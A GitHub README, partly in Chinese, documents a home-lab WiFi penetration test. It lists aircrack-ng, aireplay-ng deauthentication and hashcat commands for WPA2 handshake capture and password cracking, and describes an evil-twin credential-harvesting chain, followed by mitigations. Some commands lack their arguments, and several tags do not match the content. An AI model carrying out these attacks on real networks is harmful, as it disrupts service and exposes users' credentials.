armnsec/wireless-security-lab-wifi-pentesting
GitHub: armnsec/wireless-security-lab-wifi-pentesting
一套基于Kali Linux的WiFi渗透测试实验项目,演示WPA2握手包捕获、密码破解、反认证及邪恶双子攻击的完整流程。
Stars: 0 | Forks: 0
# 📡 无线安全实验室 (WiFi 渗透测试)
## 📌 概述
本项目展示了使用大功率外部适配器在受控实验室环境中进行的实际无线安全测试。评估重点包括 WPA2 攻击、客户端断开连接以及恶意接入点利用。
## 🧰 使用硬件
- 适配器: Alfa AWUS036ACH
- 芯片组: RTL8812AU
- 功能: 监听模式 + 数据包注入
## 💻 实验室环境
- 操作系统: Kali Linux
- 驱动程序: rtl8812au (已修补以支持监听模式)
- 目标: 个人 WiFi 实验室网络
## 🎯 测试范围
- WPA/WPA2-PSK 安全测试
- 握手包捕获
- 密码破解
- 反认证攻击
- 邪恶双子攻击
## ⚔️ 攻击方法
### 1. 开启监听模式
```
ip link set wlan0 down
iw dev wlan0 set type monitor
Verify:
iw dev
2. Reconnaissance
airodump-ng wlan0
Identify target BSSID
Note channel & clients
3. Handshake Capture
airodump-ng -c --bssid -w capture wlan0
4. Deauthentication Attack
aireplay-ng --deauth 10 -a wlan0
Forces client reconnect
Captures handshake
5. Password Cracking
hashcat -m 22000 capture.hc22000 /usr/share/wordlists/rockyou.txt
Result:
Password successfully cracked
6. Evil Twin Attack
Created fake AP with same SSID
Forced victim to connect
Captured traffic
🔗 Attack Chain
Recon
→ Monitor Mode
→ Handshake Capture
→ Password Crack
→ Network Access
→ Evil Twin
→ Credential Harvesting
🛠 Tools Used
Aircrack-ng Suite
Hashcat
Wireshark
iw / ip tools
⚠️ Key Observations
RTL8812AU supports injection but requires stable driver
Channel mismatch issues may occur
Performance depends on driver compatibility
🔐 Impact
Unauthorized network access
Credential exposure
Network disruption
🛡️ Mitigation
Use strong WPA2/WPA3 passwords
Disable WPS
Enable client isolation
Monitor deauth attacks
⚠️ Disclaimer
This testing was conducted in a controlled lab environment for educational purposes only.
ip link set wlan0 up
```
标签:Aircrack-ng, Alfa AWUS036ACH, Bitdefender, DOS头擦除, Evil Twin攻击, Hashcat, RTL8812AU, WiFi渗透测试, WPA2攻击, 中间人攻击, 安全实验, 密码破解, 恶意双胞胎, 握手包抓取, 无线网卡, 监听模式, 网络安全, 网络攻防, 解除认证攻击, 防御绕过, 隐私保护